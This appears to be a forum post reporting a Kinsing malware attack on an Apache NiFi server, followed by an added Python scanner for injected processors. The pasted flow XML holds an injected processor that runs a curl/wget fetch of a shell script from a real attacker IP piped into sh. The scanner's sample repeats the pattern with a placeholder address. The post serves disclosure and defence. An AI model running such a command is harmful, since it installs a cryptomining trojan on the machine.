Kinsing malware attack in NIFI

Hi, we have recently been attacked by a malware called Kinsing. It adds some ExecuteProcess processors at position x=0.0 y=0.0 to call `(curl -s 194.40.243.61/ni.sh||wget -q -O- 194.40.243.61/ni.sh)|sh`. Then it downloads a 13.96 MB Linux.Trojan.H2Miner.11.23.vyiz file.

<processor>
<id>1c9a1065-1006-1036-7699-e65474d32047</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>1c9a1066-1006-1036-bcc8-f49877defa39</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>1c9a1067-1006-1036-d132-ededb5e5f411</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>0 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>STOPPED</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
</property>
<property>
<name>Command Arguments</name>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
</processor>
<processor>
<id>25ae4a26-0176-1000-0c40-337865e61a7b</id>
<name>ExecuteProcess</name>
<position x="0.0" y="0.0"/>
<styles/>
<comment/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<bundle>
<group>org.apache.nifi</group>
<artifact>nifi-standard-nar</artifact>
<version>1.11.4</version>
</bundle>
<maxConcurrentTasks>1</maxConcurrentTasks>
<schedulingPeriod>3600 sec</schedulingPeriod>
<penalizationPeriod>30 sec</penalizationPeriod>
<yieldPeriod>1 sec</yieldPeriod>
<bulletinLevel>WARN</bulletinLevel>
<lossTolerant>false</lossTolerant>
<scheduledState>RUNNING</scheduledState>
<schedulingStrategy>TIMER_DRIVEN</schedulingStrategy>
<executionNode>ALL</executionNode>
<runDurationNanos>0</runDurationNanos>
<property>
<name>Command</name>
<value>bash</value>
</property>
<property>
<name>Command Arguments</name>
<value>-c "(curl -s 194.40.243.61/ni.sh||wget -q -O- 194.40.243.61/ni.sh)|sh"</value>
</property>
<property>
<name>Batch Duration</name>
</property>
<property>
<name>Redirect Error Stream</name>
<value>false</value>
</property>
<property>
<name>Working Directory</name>
</property>
<property>
<name>Argument Delimiter</name>
<value> </value>
</property>
<autoTerminatedRelationship>success</autoTerminatedRelationship>
</processor>
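An added example, not code from the original post or from the NiFi project: a Python scan over a flow.xml that flags shell-capable processors matching the pattern described above (a fetch-and-pipe-to-shell command line, or placement at canvas origin 0,0). The embedded XML is a constructed sample and 203.0.113.10 is a documentation-range placeholder, not an indicator.

```python
import re
import xml.etree.ElementTree as ET
# Constructed flow.xml fragment: one benign ExecuteProcess and one injected one.
SAMPLE_FLOW = """<flowController>
<processor>
<id>aaaa0001-0000-1000-0000-000000000001</id>
<position x="412.0" y="188.0"/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<property><name>Command</name><value>/opt/etl/rotate_logs.sh</value></property>
<property><name>Command Arguments</name><value>--days 7</value></property>
</processor>
<processor>
<id>aaaa0002-0000-1000-0000-000000000002</id>
<position x="0.0" y="0.0"/>
<class>org.apache.nifi.processors.standard.ExecuteProcess</class>
<scheduledState>RUNNING</scheduledState>
<property><name>Command</name><value>bash</value></property>
<property><name>Command Arguments</name>
<value>-c "(curl -s 203.0.113.10/x.sh||wget -q -O- 203.0.113.10/x.sh)|sh"</value></property>
</processor>
</flowController>"""

# Processor types that run OS commands, and the fetch-then-pipe-to-shell pattern.
SHELL_CLASSES = ("ExecuteProcess", "ExecuteStreamCommand")
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*?\|\s*(ba)?sh\b", re.S)

def props(proc):
    # Property name -> value; NiFi omits <value> entirely for unset properties.
    return {p.findtext("name"): (p.findtext("value") or "")
            for p in proc.findall("property")}

def find_suspicious(flow_xml):
    """Return (id, class, scheduledState, reasons) for each processor that matches."""
    hits = []
    for proc in ET.fromstring(flow_xml).iter("processor"):
        cls = proc.findtext("class", "").rsplit(".", 1)[-1]
        if cls not in SHELL_CLASSES:
            continue
        p = props(proc)
        cmdline = " ".join(p.get(k, "") for k in ("Command", "Command Path", "Command Arguments"))
        reasons = []
        if REMOTE_FETCH.search(cmdline):
            reasons.append("downloads a remote script and pipes it to a shell")
        pos = proc.find("position")
        if pos is not None and (pos.get("x"), pos.get("y")) == ("0.0", "0.0"):
            reasons.append("placed at canvas origin (0,0), typical of API-injected processors")
        if reasons:
            hits.append((proc.findtext("id"), cls, proc.findtext("scheduledState"), reasons))
    return hits
```

Run it against a real flow.xml with `find_suspicious(open(path).read())`; a hit whose scheduledState is RUNNING deserves the most urgent attention.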